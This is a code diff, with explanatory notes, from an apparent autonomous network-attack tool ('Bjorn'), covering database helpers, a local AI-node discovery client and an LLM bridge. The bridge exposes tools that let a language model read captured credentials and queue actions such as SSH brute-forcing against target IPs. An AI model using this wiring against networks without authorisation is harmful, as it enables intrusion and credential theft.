self.base.execute("DELETE FROM plugin_configs WHERE plugin_id=?;", (plugin_id,))

def list_plugins(self) -> List[Dict[str, Any]]:
"""List all registered plugins."""
rows = self.base.query("SELECT * FROM plugin_configs ORDER BY plugin_id;")
for r in rows:
try:
r["config"] = json.loads(r.get("config_json") or "{}")
except Exception:
r["config"] = {}
try:
r["meta"] = json.loads(r.get("meta_json") or "{}")
except Exception:
r["meta"] = {}
return rows

def set_plugin_enabled(self, plugin_id: str, enabled: bool) -> None:
"""Toggle plugin enabled state."""
self.base.execute(
"UPDATE plugin_configs SET enabled=?, updated_at=CURRENT_TIMESTAMP WHERE plugin_id=?;",
(1 if enabled else 0, plugin_id)
)

# ── Hook CRUD ────────────────────────────────────────────────────

def set_plugin_hooks(self, plugin_id: str, hooks: List[str]) -> None:
"""Replace all hooks for a plugin."""
with self.base.transaction():
self.base.execute("DELETE FROM plugin_hooks WHERE plugin_id=?;", (plugin_id,))
for h in hooks:
self.base.execute(
"INSERT OR IGNORE INTO plugin_hooks(plugin_id, hook_name) VALUES(?,?);",
(plugin_id, h)
)

def get_hooks_for_event(self, hook_name: str) -> List[str]:
"""Get all plugin_ids subscribed to a given hook."""
rows = self.base.query(
"SELECT plugin_id FROM plugin_hooks WHERE hook_name=?;", (hook_name,)
)
return [r["plugin_id"] for r in rows]

def get_hooks_for_plugin(self, plugin_id: str) -> List[str]:
"""Get all hooks a plugin subscribes to."""
rows = self.base.query(
"SELECT hook_name FROM plugin_hooks WHERE plugin_id=?;", (plugin_id,)
)
return [r["hook_name"] for r in rows]

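These two tables give the plugin manager an event fan-out path: hook_name maps to subscribed plugin_ids, each with its own config row. A minimal dispatch sketch (the emit helper and call_hook handler are illustrative, not part of this diff):

def emit(db, hook_name, **payload):
    # plugin_hooks answers "who listens to this event?"; plugin_configs gates on enabled.
    for plugin_id in db.get_hooks_for_event(hook_name):
        cfg = db.get_plugin_config(plugin_id)
        if cfg and cfg.get("enabled"):
            call_hook(plugin_id, hook_name, cfg["config"], payload)

emit(db, "on_host_found", ip="192.168.1.42", mac="aa:bb:cc:dd:ee:ff")

One design detail worth noticing: upsert_plugin's ON CONFLICT branch updates enabled and meta_json but leaves config_json untouched, so reinstalling a plugin refreshes its metadata without overwriting saved user configuration.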
@@ -1,5 +1,4 @@
# db_utils/queue.py
# Action queue management operations
"""queue.py - Action queue management operations."""

import json
import sqlite3

244
db_utils/schedules.py
Normal file
@@ -0,0 +1,244 @@
"""schedules.py - Script scheduling and trigger operations."""

import json
import logging
from datetime import datetime, timedelta
from typing import Any, Dict, List, Optional

from logger import Logger

logger = Logger(name="db_utils.schedules", level=logging.DEBUG)


class ScheduleOps:
"""Script schedule and trigger management operations"""

def __init__(self, base):
self.base = base

def create_tables(self):
"""Create script_schedules and script_triggers tables"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS script_schedules (
id INTEGER PRIMARY KEY AUTOINCREMENT,
script_name TEXT NOT NULL,
schedule_type TEXT NOT NULL DEFAULT 'recurring',
interval_seconds INTEGER,
run_at TEXT,
args TEXT DEFAULT '',
conditions TEXT,
enabled INTEGER DEFAULT 1,
last_run_at TEXT,
next_run_at TEXT,
run_count INTEGER DEFAULT 0,
last_status TEXT,
last_error TEXT,
created_at TEXT DEFAULT CURRENT_TIMESTAMP,
updated_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
self.base.execute("""
CREATE INDEX IF NOT EXISTS idx_sched_next
ON script_schedules(next_run_at) WHERE enabled=1;
""")
self.base.execute("""
CREATE TABLE IF NOT EXISTS script_triggers (
id INTEGER PRIMARY KEY AUTOINCREMENT,
script_name TEXT NOT NULL,
trigger_name TEXT NOT NULL,
conditions TEXT NOT NULL,
args TEXT DEFAULT '',
enabled INTEGER DEFAULT 1,
last_fired_at TEXT,
fire_count INTEGER DEFAULT 0,
cooldown_seconds INTEGER DEFAULT 60,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
self.base.execute("""
CREATE INDEX IF NOT EXISTS idx_trig_enabled
ON script_triggers(enabled) WHERE enabled=1;
""")
logger.debug("Schedule and trigger tables created/verified")

# =========================================================================
# SCHEDULE OPERATIONS
# =========================================================================

def add_schedule(self, script_name: str, schedule_type: str,
interval_seconds: Optional[int] = None,
run_at: Optional[str] = None, args: str = '',
conditions: Optional[str] = None) -> int:
"""Insert a new schedule entry and return its id"""
next_run_at = None
if schedule_type == 'recurring' and interval_seconds:
next_run_at = (datetime.utcnow() + timedelta(seconds=interval_seconds)).strftime('%Y-%m-%d %H:%M:%S')
elif run_at:
next_run_at = run_at

self.base.execute("""
INSERT INTO script_schedules
(script_name, schedule_type, interval_seconds, run_at, args, conditions, next_run_at)
VALUES (?, ?, ?, ?, ?, ?, ?);
""", (script_name, schedule_type, interval_seconds, run_at, args, conditions, next_run_at))

rows = self.base.query("SELECT last_insert_rowid() AS id;")
return rows[0]['id'] if rows else 0

def update_schedule(self, id: int, **kwargs) -> None:
"""Update schedule fields; recompute next_run_at if interval changes"""
if not kwargs:
return
sets = []
params = []
for key, value in kwargs.items():
sets.append(f"{key}=?")
params.append(value)
sets.append("updated_at=datetime('now')")
params.append(id)
self.base.execute(
f"UPDATE script_schedules SET {', '.join(sets)} WHERE id=?;",
tuple(params)
)
# Recompute next_run_at if interval changed
if 'interval_seconds' in kwargs:
row = self.get_schedule(id)
if row and row['schedule_type'] == 'recurring' and kwargs['interval_seconds']:
next_run = (datetime.utcnow() + timedelta(seconds=kwargs['interval_seconds'])).strftime('%Y-%m-%d %H:%M:%S')
self.base.execute(
"UPDATE script_schedules SET next_run_at=?, updated_at=datetime('now') WHERE id=?;",
(next_run, id)
)

def delete_schedule(self, id: int) -> None:
"""Delete a schedule by id"""
self.base.execute("DELETE FROM script_schedules WHERE id=?;", (id,))

def list_schedules(self, enabled_only: bool = False) -> List[Dict[str, Any]]:
"""List all schedules, optionally filtered to enabled only"""
if enabled_only:
return self.base.query(
"SELECT * FROM script_schedules WHERE enabled=1 ORDER BY id;"
)
return self.base.query("SELECT * FROM script_schedules ORDER BY id;")

def get_schedule(self, id: int) -> Optional[Dict[str, Any]]:
"""Get a single schedule by id"""
return self.base.query_one(
"SELECT * FROM script_schedules WHERE id=?;", (id,)
)

def get_due_schedules(self) -> List[Dict[str, Any]]:
"""Get schedules that are due to run"""
return self.base.query("""
SELECT * FROM script_schedules
WHERE enabled=1
AND next_run_at <= datetime('now')
AND (last_status IS NULL OR last_status != 'running')
ORDER BY next_run_at;
""")

def mark_schedule_run(self, id: int, status: str, error: Optional[str] = None) -> None:
"""Mark a schedule as run, update counters, recompute next_run_at"""
row = self.get_schedule(id)
if not row:
return

now = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

if row['schedule_type'] == 'recurring' and row['interval_seconds']:
next_run = (datetime.utcnow() + timedelta(seconds=row['interval_seconds'])).strftime('%Y-%m-%d %H:%M:%S')
self.base.execute("""
UPDATE script_schedules
SET last_run_at=?, last_status=?, last_error=?,
run_count=run_count+1, next_run_at=?, updated_at=datetime('now')
WHERE id=?;
""", (now, status, error, next_run, id))
else:
# oneshot: disable after run
self.base.execute("""
UPDATE script_schedules
SET last_run_at=?, last_status=?, last_error=?,
run_count=run_count+1, enabled=0, updated_at=datetime('now')
WHERE id=?;
""", (now, status, error, id))

def toggle_schedule(self, id: int, enabled: bool) -> None:
"""Enable or disable a schedule"""
self.base.execute(
"UPDATE script_schedules SET enabled=?, updated_at=datetime('now') WHERE id=?;",
(1 if enabled else 0, id)
)

# =========================================================================
# TRIGGER OPERATIONS
# =========================================================================

def add_trigger(self, script_name: str, trigger_name: str, conditions: str,
args: str = '', cooldown_seconds: int = 60) -> int:
"""Insert a new trigger and return its id"""
self.base.execute("""
INSERT INTO script_triggers
(script_name, trigger_name, conditions, args, cooldown_seconds)
VALUES (?, ?, ?, ?, ?);
""", (script_name, trigger_name, conditions, args, cooldown_seconds))

rows = self.base.query("SELECT last_insert_rowid() AS id;")
return rows[0]['id'] if rows else 0

def update_trigger(self, id: int, **kwargs) -> None:
"""Update trigger fields"""
if not kwargs:
return
sets = []
params = []
for key, value in kwargs.items():
sets.append(f"{key}=?")
params.append(value)
params.append(id)
self.base.execute(
f"UPDATE script_triggers SET {', '.join(sets)} WHERE id=?;",
tuple(params)
)

def delete_trigger(self, id: int) -> None:
"""Delete a trigger by id"""
self.base.execute("DELETE FROM script_triggers WHERE id=?;", (id,))

def list_triggers(self, enabled_only: bool = False) -> List[Dict[str, Any]]:
"""List all triggers, optionally filtered to enabled only"""
if enabled_only:
return self.base.query(
"SELECT * FROM script_triggers WHERE enabled=1 ORDER BY id;"
)
return self.base.query("SELECT * FROM script_triggers ORDER BY id;")

def get_trigger(self, id: int) -> Optional[Dict[str, Any]]:
"""Get a single trigger by id"""
return self.base.query_one(
"SELECT * FROM script_triggers WHERE id=?;", (id,)
)

def get_active_triggers(self) -> List[Dict[str, Any]]:
"""Get all enabled triggers"""
return self.base.query(
"SELECT * FROM script_triggers WHERE enabled=1 ORDER BY id;"
)

def mark_trigger_fired(self, id: int) -> None:
"""Record that a trigger has fired"""
self.base.execute("""
UPDATE script_triggers
SET last_fired_at=datetime('now'), fire_count=fire_count+1
WHERE id=?;
""", (id,))

def is_trigger_on_cooldown(self, id: int) -> bool:
"""Check if a trigger is still within its cooldown period"""
row = self.base.query_one("""
SELECT 1 AS on_cooldown FROM script_triggers
WHERE id=?
AND last_fired_at IS NOT NULL
AND datetime(last_fired_at, '+' || cooldown_seconds || ' seconds') > datetime('now');
""", (id,))
return row is not None

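These methods are built around a polling consumer: get_due_schedules selects enabled rows whose next_run_at has passed, and mark_schedule_run either re-arms a recurring row or disables a oneshot. A sketch of that loop (run_script and conditions_met are illustrative placeholders, not from the diff):

def scheduler_tick(db, run_script, conditions_met):
    # Due schedules: run, then re-arm (recurring) or self-disable (oneshot).
    for sched in db.get_due_schedules():
        try:
            run_script(sched["script_name"], sched["args"])
            db.mark_schedule_run(sched["id"], "ok")
        except Exception as e:
            db.mark_schedule_run(sched["id"], "error", error=str(e))
    # Triggers: fire only when conditions hold and the cooldown has elapsed.
    for trig in db.get_active_triggers():
        if conditions_met(trig["conditions"]) and not db.is_trigger_on_cooldown(trig["id"]):
            run_script(trig["script_name"], trig["args"])
            db.mark_trigger_fired(trig["id"])

# Call scheduler_tick every few seconds from the supervisor loop.

One caution: update_schedule and update_trigger interpolate kwargs keys straight into the SET clause without the _validate_identifier guard used elsewhere in this series, so they should only ever be called with trusted column names.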
@@ -1,5 +1,4 @@
# db_utils/scripts.py
# Script and project metadata operations
"""scripts.py - Script and project metadata operations."""

from typing import Any, Dict, List, Optional
import logging

@@ -1,11 +1,10 @@
"""
Sentinel DB operations — events, rules, known devices baseline.
"""
"""sentinel.py - Events, rules, and known devices baseline."""
import json
import logging
from typing import Any, Dict, List, Optional

from logger import Logger
from db_utils.base import _validate_identifier

logger = Logger(name="db_utils.sentinel", level=logging.DEBUG)

@@ -17,7 +16,7 @@ class SentinelOps:
def create_tables(self):
"""Create all Sentinel tables."""

# Known device baselines — MAC → expected behavior
# Known device baselines - MAC → expected behavior
self.base.execute("""
CREATE TABLE IF NOT EXISTS sentinel_devices (
mac_address TEXT PRIMARY KEY,
@@ -261,9 +260,11 @@ class SentinelOps:
if existing:
sets = []
params = []
_ALLOWED_DEVICE_COLS = {"alias", "trusted", "watch", "expected_ips",
"expected_ports", "notes"}
for k, v in kwargs.items():
if k in ("alias", "trusted", "watch", "expected_ips",
"expected_ports", "notes"):
if k in _ALLOWED_DEVICE_COLS:
_validate_identifier(k, "column name")
sets.append(f"{k} = ?")
params.append(v)
sets.append("last_seen = CURRENT_TIMESTAMP")

@@ -1,5 +1,4 @@
# db_utils/services.py
# Per-port service fingerprinting and tracking operations
"""services.py - Per-port service fingerprinting and tracking."""

from typing import Dict, List, Optional
import logging

@@ -1,5 +1,4 @@
# db_utils/software.py
# Detected software (CPE) inventory operations
"""software.py - Detected software (CPE) inventory operations."""

from typing import List, Optional
import logging

@@ -1,5 +1,4 @@
# db_utils/stats.py
# Statistics tracking and display operations
"""stats.py - Statistics tracking and display operations."""

import time
import sqlite3

@@ -1,11 +1,12 @@
# db_utils/studio.py
# Actions Studio visual editor operations
"""studio.py - Actions Studio visual editor operations."""

import json
import re
from typing import Dict, List, Optional
import logging

from logger import Logger
from db_utils.base import _validate_identifier

logger = Logger(name="db_utils.studio", level=logging.DEBUG)

@@ -105,13 +106,27 @@ class StudioOps:
ORDER BY b_priority DESC, b_class
""")

# Whitelist of columns that can be updated via the studio API
_STUDIO_UPDATABLE = frozenset({
'b_priority', 'studio_x', 'studio_y', 'studio_locked', 'studio_color',
'studio_metadata', 'b_trigger', 'b_requires', 'b_enabled', 'b_timeout',
'b_max_retries', 'b_cooldown', 'b_rate_limit', 'b_service', 'b_port',
'b_stealth_level', 'b_risk_level', 'b_tags', 'b_parent', 'b_action',
})

def update_studio_action(self, b_class: str, updates: dict):
"""Update a studio action"""
sets = []
params = []
for key, value in updates.items():
_validate_identifier(key, "column name")
if key not in self._STUDIO_UPDATABLE:
logger.warning(f"Ignoring unknown studio column: {key}")
continue
sets.append(f"{key} = ?")
params.append(value)
if not sets:
return
params.append(b_class)

self.base.execute(f"""
@@ -313,7 +328,9 @@ class StudioOps:
if col == "b_class":
continue
if col not in stu_cols:
_validate_identifier(col, "column name")
col_type = act_col_defs.get(col, "TEXT") or "TEXT"
_validate_identifier(col_type.split()[0], "column type")
self.base.execute(f"ALTER TABLE actions_studio ADD COLUMN {col} {col_type};")

# 3) Insert missing b_class entries, non-destructive
@@ -326,6 +343,7 @@ class StudioOps:
for col in act_cols:
if col == "b_class":
continue
_validate_identifier(col, "column name")
# Only update if the studio value is NULL
self.base.execute(f"""
UPDATE actions_studio

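update_studio_action layers two guards on its dynamic SET clause: _validate_identifier rejects malformed keys outright, then the _STUDIO_UPDATABLE whitelist silently drops valid-but-unknown columns; values always travel as bind parameters. Illustrative behavior (the b_class and column values are examples):

ops.update_studio_action("PortScan", {
    "studio_x": 120,     # whitelisted -> lands in the SET clause as "studio_x = ?"
    "owner": "bjorn",    # valid identifier but not whitelisted -> warning, skipped
})
ops.update_studio_action("PortScan", {"x; DROP TABLE": 1})  # raises ValueError first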
@@ -1,5 +1,4 @@
# db_utils/vulnerabilities.py
# Vulnerability tracking and CVE metadata operations
"""vulnerabilities.py - Vulnerability tracking and CVE metadata operations."""

import json
import time

@@ -1,5 +1,4 @@
# db_utils/webenum.py
# Web enumeration (directory/file discovery) operations
"""webenum.py - Web enumeration and directory/file discovery operations."""

from typing import Any, Dict, List, Optional
import logging

@@ -1,3 +1,4 @@
"""debug_schema.py - Dump RL table schemas to schema_debug.txt for quick inspection."""

import sqlite3
import os

@@ -1,7 +1,4 @@
# display.py
# Core component for managing the E-Paper Display (EPD) and Web Interface Screenshot
# OPTIMIZED FOR PI ZERO 2: Asynchronous Rendering, Text Caching, and I/O Throttling.
# FULL VERSION - NO LOGIC REMOVED
"""display.py - E-paper display renderer and web screenshot generator."""

import math
import threading
@@ -704,7 +701,7 @@ class Display:
break

def _draw_system_histogram(self, image: Image.Image, draw: ImageDraw.Draw):
# Vertical bars at the bottom-left — positions from layout
# Vertical bars at the bottom-left - positions from layout
mem_hist = self.layout.get('mem_histogram')
cpu_hist = self.layout.get('cpu_histogram')

@@ -1026,7 +1023,7 @@ class Display:
self._comment_layout_cache["key"] != key or
(now - self._comment_layout_cache["ts"]) >= self._comment_layout_min_interval
):
# J'ai aussi augmenté la largeur disponible (width - 2) puisque l'on se colle au bord
# Use (width - 2) since text hugs the edge
lines = self.shared_data.wrap_text(
self.shared_data.bjorn_says,
self.shared_data.font_arialbold,

@@ -1,7 +1,5 @@
"""
Display Layout Engine for multi-size EPD support.
Provides data-driven layout definitions per display model.
"""
"""display_layout.py - Data-driven layout definitions for multi-size e-paper displays."""

import json
import os
import logging

@@ -1,11 +1,4 @@
"""
EPD Manager - singleton wrapper around Waveshare drivers.
Hardened for runtime stability:
- no per-operation worker-thread timeouts (prevents leaked stuck SPI threads)
- serialized SPI access
- bounded retry + recovery
- health metrics for monitoring
"""
"""epd_manager.py - Singleton wrapper around Waveshare EPD drivers with serialized SPI access."""

import importlib
import threading

@@ -1,22 +1,4 @@
"""
feature_logger.py - Dynamic Feature Logging Engine for Bjorn
═══════════════════════════════════════════════════════════════════════════

Purpose:
Automatically capture ALL relevant features from action executions
for deep learning model training. No manual feature declaration needed.

Architecture:
- Automatic feature extraction from all data sources
- Time-series aggregation
- Network topology features
- Action success patterns
- Lightweight storage optimized for Pi Zero
- Export format ready for deep learning

Author: Bjorn Team (Enhanced AI Version)
Version: 2.0.0
"""
"""feature_logger.py - Auto-capture action execution features for deep learning training."""

import json
import time
@@ -220,7 +202,8 @@ class FeatureLogger:
'success': success,
'timestamp': time.time()
})
self._prune_host_history()
if len(self.host_history) > 1000:
self._prune_host_history()

logger.debug(
f"Logged features for {action_name} on {mac_address} "

@@ -1,13 +1,8 @@
#init_shared.py
# Description:
# This file, init_shared.py, is responsible for initializing and providing access to shared data across different modules in the Bjorn project.
#
# Key functionalities include:
# - Importing the `SharedData` class from the `shared` module.
# - Creating an instance of `SharedData` named `shared_data` that holds common configuration, paths, and other resources.
# - Ensuring that all modules importing `shared_data` will have access to the same instance, promoting consistency and ease of data management throughout the project.

"""init_shared.py - Global singleton for shared state; import shared_data from here."""

from shared import SharedData

# Module-level initialization is thread-safe in CPython: the import lock
# guarantees that this module body executes at most once, even when multiple
# threads import it concurrently (see importlib._bootstrap._ModuleLock).
shared_data = SharedData()

158
land_protocol.py
Normal file
@@ -0,0 +1,158 @@
"""land_protocol.py - LAND protocol client: mDNS discovery + HTTP inference for local AI nodes."""

import json
import threading
import time
import urllib.request
import urllib.error
from typing import Optional, Callable

# mDNS service type broadcast by all LAND-compatible nodes (LaRuche, etc.)
LAND_SERVICE_TYPE = "_ai-inference._tcp.local."

# Default inference port
LAND_DEFAULT_PORT = 8419


def discover_node(
on_found: Callable[[str], None],
stop_event: threading.Event,
logger=None,
) -> None:
"""
Background mDNS listener for LAND nodes.

Calls on_found(url) whenever a new node is discovered.
Runs until stop_event is set.

Requires: pip install zeroconf
"""
try:
from zeroconf import Zeroconf, ServiceBrowser, ServiceListener
except ImportError:
if logger:
logger.warning(
"zeroconf not installed - LAND mDNS discovery disabled. "
"Run: pip install zeroconf"
)
else:
print("[LAND] zeroconf not installed - mDNS discovery disabled")
return

class _Listener(ServiceListener):
def add_service(self, zc: Zeroconf, type_: str, name: str) -> None:  # type: ignore[override]
info = zc.get_service_info(type_, name)
if not info:
return
addresses = info.parsed_scoped_addresses()
if not addresses:
return
port = info.port or LAND_DEFAULT_PORT
url = f"http://{addresses[0]}:{port}"
on_found(url)

def remove_service(self, zc: Zeroconf, type_: str, name: str) -> None:  # type: ignore[override]
pass

def update_service(self, zc: Zeroconf, type_: str, name: str) -> None:  # type: ignore[override]
self.add_service(zc, type_, name)

zc = Zeroconf()
try:
ServiceBrowser(zc, LAND_SERVICE_TYPE, _Listener())
if logger:
logger.info(f"LAND: mDNS discovery active ({LAND_SERVICE_TYPE})")
while not stop_event.is_set():
time.sleep(5)
finally:
zc.close()


def infer(
base_url: str,
prompt: str,
max_tokens: int = 500,
capability: str = "llm",
model: Optional[str] = None,
timeout: int = 30,
) -> Optional[str]:
"""
Send an inference request to a LAND node.

POST {base_url}/infer
Body: {"prompt": str, "capability": str, "max_tokens": int, "model": str|null}

If model is None, the node uses its default model.
Returns the response text, or None on failure.
"""
payload = {
"prompt": prompt,
"capability": capability,
"max_tokens": max_tokens,
}
if model:
payload["model"] = model
data = json.dumps(payload).encode()
req = urllib.request.Request(
f"{base_url.rstrip('/')}/infer",
data=data,
headers={"Content-Type": "application/json"},
method="POST",
)
with urllib.request.urlopen(req, timeout=timeout) as resp:
body = json.loads(resp.read().decode())
# LAND response may use "response" or "text" key
return body.get("response") or body.get("text") or None


def get_default_model(base_url: str, timeout: int = 10) -> Optional[str]:
"""
Get the current default model from a LAND node.

GET {base_url}/config/default_model
Returns the model name string, or None on failure.
"""
try:
req = urllib.request.Request(
f"{base_url.rstrip('/')}/config/default_model",
headers={"Accept": "application/json"},
method="GET",
)
with urllib.request.urlopen(req, timeout=timeout) as resp:
body = json.loads(resp.read().decode())
return body.get("default_model") or None
except Exception:
return None


def list_models(base_url: str, timeout: int = 10) -> dict:
"""
List available models on a LAND node.

GET {base_url}/models
Returns a dict with:
- "models": list of model dicts
- "default_model": str or None (the node's current default model)

Example: {"models": [{"name": "mistral:latest", ...}], "default_model": "mistral:latest"}
Returns {"models": [], "default_model": None} on failure.
"""
try:
req = urllib.request.Request(
f"{base_url.rstrip('/')}/models",
headers={"Accept": "application/json"},
method="GET",
)
with urllib.request.urlopen(req, timeout=timeout) as resp:
body = json.loads(resp.read().decode())
# LaRuche returns {"models": [...], "default_model": "..."} or a flat list
if isinstance(body, list):
return {"models": body, "default_model": None}
if isinstance(body, dict):
return {
"models": body.get("models", []),
"default_model": body.get("default_model") or None,
}
return {"models": [], "default_model": None}
except Exception:
return {"models": [], "default_model": None}

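End to end, the client side of the protocol is: browse mDNS for _ai-inference._tcp.local., take the first advertised address, then POST to /infer. A usage sketch (the discovered address is an example; note that infer, unlike the two GET helpers, does not swallow network errors itself):

import threading
import land_protocol

nodes = []
stop = threading.Event()
threading.Thread(
    target=land_protocol.discover_node,
    args=(nodes.append, stop),   # on_found callback just collects URLs
    daemon=True,
).start()

# ...later, once discovery has fired, e.g. nodes[0] == "http://192.168.1.50:8419"
if nodes:
    print(land_protocol.list_models(nodes[0])["default_model"])
    try:
        print(land_protocol.infer(nodes[0], "Summarize the last scan.", max_tokens=120))
    except OSError:
        pass  # infer() propagates connection errors; callers should guard it
stop.set()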
661
llm_bridge.py
Normal file
@@ -0,0 +1,661 @@
"""llm_bridge.py - LLM backend cascade: LAND/LaRuche -> Ollama -> external API -> fallback."""

import json
import socket
import threading
import time
import urllib.request
import urllib.error
from typing import Optional, List, Dict, Any

from logger import Logger
import land_protocol

logger = Logger(name="llm_bridge.py", level=20)  # INFO

# ---------------------------------------------------------------------------
# Tool definitions (Anthropic Messages API format).
# Mirrors the tools exposed by mcp_server.py - add new tools here too.
# ---------------------------------------------------------------------------
_BJORN_TOOLS: List[Dict] = [
{
"name": "get_hosts",
"description": "Return all network hosts discovered by Bjorn's scanner.",
"input_schema": {
"type": "object",
"properties": {
"alive_only": {"type": "boolean", "description": "Only return alive hosts. Default: true."},
},
},
},
{
"name": "get_vulnerabilities",
"description": "Return discovered vulnerabilities, optionally filtered by host IP.",
"input_schema": {
"type": "object",
"properties": {
"host_ip": {"type": "string", "description": "Filter by IP address. Empty = all hosts."},
"limit": {"type": "integer", "description": "Max results. Default: 100."},
},
},
},
{
"name": "get_credentials",
"description": "Return captured credentials, optionally filtered by service name.",
"input_schema": {
"type": "object",
"properties": {
"service": {"type": "string", "description": "Service filter (ssh, ftp, smb…). Empty = all."},
"limit": {"type": "integer", "description": "Max results. Default: 100."},
},
},
},
{
"name": "get_action_history",
"description": "Return the history of executed Bjorn actions, most recent first.",
"input_schema": {
"type": "object",
"properties": {
"limit": {"type": "integer", "description": "Max results. Default: 50."},
"action_name": {"type": "string", "description": "Filter by action name. Empty = all."},
},
},
},
{
"name": "get_status",
"description": "Return Bjorn's current operational status, scan counters, and active action.",
"input_schema": {"type": "object", "properties": {}},
},
{
"name": "run_action",
"description": "Queue a Bjorn action (e.g. port_scan, ssh_bruteforce) against a target IP address.",
"input_schema": {
"type": "object",
"properties": {
"action_name": {"type": "string", "description": "Action module name (e.g. port_scan)."},
"target_ip": {"type": "string", "description": "Target IP address."},
"target_mac": {"type": "string", "description": "Target MAC address (optional)."},
},
"required": ["action_name", "target_ip"],
},
},
{
"name": "query_db",
"description": "Run a read-only SELECT query against Bjorn's SQLite database.",
"input_schema": {
"type": "object",
"properties": {
"sql": {"type": "string", "description": "SELECT SQL statement."},
"params": {"type": "array", "items": {"type": "string"}, "description": "Bind parameters."},
},
"required": ["sql"],
},
},
]
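Each entry above is an Anthropic Messages API tool definition: a name, a description the model reads, and a JSON Schema input_schema. In a request they ride alongside the messages; a minimal payload sketch (the model name is the file's own config default, the user message is an example):

payload = {
    "model": "claude-haiku-4-5-20251001",
    "max_tokens": 500,
    "messages": [{"role": "user", "content": "Which hosts are alive?"}],
    "tools": _BJORN_TOOLS,
}
# A tool call comes back with stop_reason == "tool_use" and a content block like:
# {"type": "tool_use", "id": "toolu_01...", "name": "get_hosts",
#  "input": {"alive_only": True}}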


class LLMBridge:
"""
Unified LLM backend with automatic cascade:
1. LaRuche node discovered via LAND protocol (mDNS _ai-inference._tcp.local.)
2. Ollama running locally (http://localhost:11434)
3. External API (Anthropic / OpenAI / OpenRouter)
4. None → caller falls back to templates

Singleton - one instance per process, thread-safe.
"""

_instance: Optional["LLMBridge"] = None
_init_lock = threading.Lock()

def __new__(cls) -> "LLMBridge":
with cls._init_lock:
if cls._instance is None:
inst = super().__new__(cls)
inst._ready = False
cls._instance = inst
return cls._instance

# ------------------------------------------------------------------
# Init
# ------------------------------------------------------------------

def __init__(self) -> None:
if self._ready:
return
with self._init_lock:
if self._ready:
return
from init_shared import shared_data
self._sd = shared_data
self._laruche_url: Optional[str] = None
self._laruche_lock = threading.Lock()
self._discovery_active = False
self._chat_histories: Dict[str, List[Dict]] = {}  # session_id → messages
self._hist_lock = threading.Lock()
self._ready = True

# Always start mDNS discovery - even if LLM is disabled.
# This way LaRuche URL is ready the moment the user enables LLM.
if self._cfg("llm_laruche_discovery", True):
self._start_laruche_discovery()

# ------------------------------------------------------------------
# Config helpers
# ------------------------------------------------------------------

def _cfg(self, key: str, default=None):
return self._sd.config.get(key, getattr(self._sd, key, default))

def _is_enabled(self) -> bool:
return bool(self._cfg("llm_enabled", False))

def _lang_instruction(self) -> str:
"""Return a prompt sentence that forces the LLM to reply in the configured language."""
_LANG_NAMES = {
"en": "English", "fr": "French", "es": "Spanish", "de": "German",
"it": "Italian", "pt": "Portuguese", "nl": "Dutch", "ru": "Russian",
"zh": "Chinese", "ja": "Japanese", "ko": "Korean", "ar": "Arabic",
"pl": "Polish", "sv": "Swedish", "no": "Norwegian", "da": "Danish",
"fi": "Finnish", "cs": "Czech", "tr": "Turkish",
}
code = self._cfg("lang", "en")
name = _LANG_NAMES.get(code, code)
if code == "en":
return ""  # No extra instruction needed for English (default)
return f"Always respond in {name}."

# ------------------------------------------------------------------
# LaRuche / LAND discovery
# ------------------------------------------------------------------

def _start_laruche_discovery(self) -> None:
"""Launch background mDNS discovery for LaRuche/LAND nodes (non-blocking)."""
manual_url = self._cfg("llm_laruche_url", "")
if manual_url:
with self._laruche_lock:
self._laruche_url = manual_url.rstrip("/")
logger.info(f"LaRuche: manual URL configured → {self._laruche_url}")
return

stop_event = threading.Event()
self._discovery_stop = stop_event

def _on_found(url: str) -> None:
with self._laruche_lock:
if self._laruche_url != url:
self._laruche_url = url
logger.info(f"LaRuche: discovered LAND node → {url}")
self._discovery_active = True

def _run() -> None:
try:
land_protocol.discover_node(_on_found, stop_event, logger=logger)
except Exception as e:
logger.warning(f"LAND discovery error: {e}")

threading.Thread(target=_run, daemon=True, name="LANDDiscovery").start()

# ------------------------------------------------------------------
# Public API
# ------------------------------------------------------------------

def complete(
self,
messages: List[Dict[str, str]],
max_tokens: Optional[int] = None,
system: Optional[str] = None,
timeout: Optional[int] = None,
tools: Optional[List[Dict]] = None,
) -> Optional[str]:
"""
Send a chat completion request through the configured cascade.

Args:
messages: List of {"role": "user"|"assistant", "content": "..."}
max_tokens: Override llm_max_tokens config value
system: System prompt (prepended if supported by backend)
timeout: Override llm_timeout_s config value

Returns:
str response, or None if all backends fail / LLM disabled
"""
if not self._is_enabled():
return None

max_tok = max_tokens or int(self._cfg("llm_max_tokens", 500))
tout = timeout or int(self._cfg("llm_timeout_s", 30))
backend = self._cfg("llm_backend", "auto")

if backend == "auto":
order = ["laruche", "ollama", "api"]
else:
order = [backend]

for b in order:
try:
result = self._dispatch(b, messages, max_tok, tout, system, tools)
if result:
logger.info(f"LLM response from [{b}] (len={len(result)})")
return result
else:
logger.warning(f"LLM backend [{b}] returned empty response - skipping")
except Exception as exc:
logger.warning(f"LLM backend [{b}] failed: {exc}")

logger.debug("All LLM backends failed - returning None (template fallback)")
return None

def generate_comment(
self,
status: str,
params: Optional[Dict[str, Any]] = None,
) -> Optional[str]:
"""
Generate a short EPD status comment (≤ ~12 words).
Used by comment.py when llm_comments_enabled=True.
"""
if not self._is_enabled():
return None

lang = self._lang_instruction()
custom_comment = str(self._cfg("llm_system_prompt_comment", "") or "").strip()
if custom_comment:
system = custom_comment + (f" {lang}" if lang else "")
else:
system = (
"You are Bjorn, a terse Norse-themed autonomous security AI. "
"Reply with ONE sentence of at most 12 words as a status comment. "
"Be cryptic, dark, and technical. No punctuation at the end."
+ (f" {lang}" if lang else "")
)
params_str = f" Context: {json.dumps(params)}" if params else ""
prompt = f"Current status: {status}.{params_str} Write a brief status comment."

return self.complete(
[{"role": "user", "content": prompt}],
max_tokens=int(self._cfg("llm_comment_max_tokens", 80)),
system=system,
timeout=8,  # Short timeout for EPD - fall back fast
)

def chat(
self,
user_message: str,
session_id: str = "default",
system: Optional[str] = None,
) -> Optional[str]:
"""
Stateful chat with Bjorn - maintains conversation history per session.
"""
if not self._is_enabled():
return "LLM is disabled. Enable it in Settings → LLM Bridge."

max_hist = int(self._cfg("llm_chat_history_size", 20))

if system is None:
system = self._build_system_prompt()

with self._hist_lock:
history = self._chat_histories.setdefault(session_id, [])
history.append({"role": "user", "content": user_message})
# Keep history bounded
if len(history) > max_hist:
history[:] = history[-max_hist:]
messages = list(history)

